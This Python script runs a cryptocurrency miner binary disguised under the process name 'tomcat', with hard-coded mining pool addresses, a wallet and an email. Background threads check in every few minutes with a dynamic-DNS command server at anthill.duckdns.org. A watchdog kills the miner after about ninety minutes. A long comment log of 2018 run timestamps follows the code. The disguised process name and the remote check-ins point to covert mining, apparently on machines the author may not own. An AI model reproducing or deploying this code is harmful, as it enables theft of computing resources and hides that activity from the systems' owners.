import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:25:03.958736
#2018-02-17 16:11:03.677411
#2018-02-17 17:58:05.020251
#2018-02-17 19:46:07.896787
#2018-02-17 21:34:07.058121
#2018-02-17 23:19:01.556229
#2018-02-18 01:07:04.788286
#2018-02-18 02:53:07.052045
#2018-02-18 04:42:06.272702
#2018-02-18 06:34:05.786618
#2018-02-18 08:22:03.938854
#2018-02-18 10:10:03.519919
#2018-02-18 11:56:03.960223
#2018-02-18 13:41:01.934397
#2018-02-18 15:32:01.611031
#2018-02-18 17:20:01.981213
#2018-02-18 19:08:06.423321
#2018-02-18 20:54:06.251436
#2018-02-18 22:39:06.225809
#2018-02-19 00:28:06.830854
#2018-02-19 02:13:04.431052
#2018-02-19 04:01:06.791859
#2018-02-19 05:45:07.035301
#2018-02-19 07:32:01.936915
#2018-02-19 09:22:06.023622
#2018-02-19 11:11:09.460918
#2018-02-19 12:58:01.916813
#2018-02-19 14:45:07.337416
#2018-02-19 16:33:08.764896
#2018-02-19 18:18:08.457745
#2018-02-19 20:04:08.171540
#2018-02-19 21:54:04.680648
#2018-02-19 23:40:01.539515
#2018-02-20 01:26:07.089551
#2018-02-20 03:15:04.454338
#2018-02-20 05:03:05.387347
#2018-02-20 06:45:04.124869
#2018-02-20 08:32:06.965010
#2018-02-20 10:16:08.341778
#2018-02-20 12:01:07.879869
#2018-02-20 13:49:01.660168
#2018-02-20 15:33:09.064660
#2018-02-20 17:20:07.609447
#2018-02-20 19:11:01.414367
#2018-02-20 21:01:02.053203
#2018-02-20 22:46:01.661505
#2018-02-21 00:29:07.134615
#2018-02-21 02:16:06.364644
#2018-02-21 04:03:02.152644
#2018-02-21 05:51:01.502468
#2018-02-21 07:39:07.454241
#2018-02-21 09:24:04.106530
#2018-02-21 11:13:05.466476
#2018-02-21 13:02:02.112311
#2018-02-21 14:51:01.469676
#2018-02-21 16:39:09.895533
#2018-02-21 18:29:04.985437
#2018-02-21 20:14:07.557802
#2018-02-21 22:02:07.353609
#2018-02-21 23:49:06.715897
#2018-02-22 01:34:05.232704
#2018-02-22 03:21:05.401435
#2018-02-22 05:08:01.888104
#2018-02-22 06:51:07.160200
#2018-02-22 08:38:05.611538
#2018-02-22 10:24:07.501286
#2018-02-22 12:10:01.772506
#2018-02-22 13:57:05.448579
#2018-02-22 15:45:16.627414
#2018-02-22 17:33:02.108060
#2018-02-22 19:20:02.004525
#2018-02-22 21:11:02.100703
#2018-02-22 22:55:08.527936
#2018-02-23 00:43:01.578985
#2018-02-23 02:32:06.192516
#2018-02-23 04:20:05.932526
#2018-02-23 06:05:08.084017
#2018-02-23 07:50:04.288482
#2018-02-23 10:07:06.288960
#2018-02-23 11:59:09.104641
#2018-02-23 13:49:09.942664
#2018-02-23 15:41:08.616605
#2018-02-23 17:29:02.003807
#2018-02-23 19:16:01.647410
#2018-02-23 21:00:08.654426
#2018-02-23 22:53:04.806543
#2018-02-24 00:42:01.394228
#2018-02-24 02:32:05.183483
#2018-02-24 04:25:07.078363
#2018-02-24 06:10:06.527717
#2018-02-24 07:57:05.475712
#2018-02-24 09:42:06.058928
#2018-02-24 11:38:06.415268
#2018-02-24 13:28:06.623199
#2018-02-24 15:16:06.480741
#2018-02-24 17:08:05.019829
#2018-02-24 18:59:06.175527
#2018-02-24 20:46:04.084916
#2018-02-24 23:02:04.692890
#2018-02-25 02:19:07.991422
#2018-02-25 06:03:01.619646
#2018-02-25 11:39:08.010334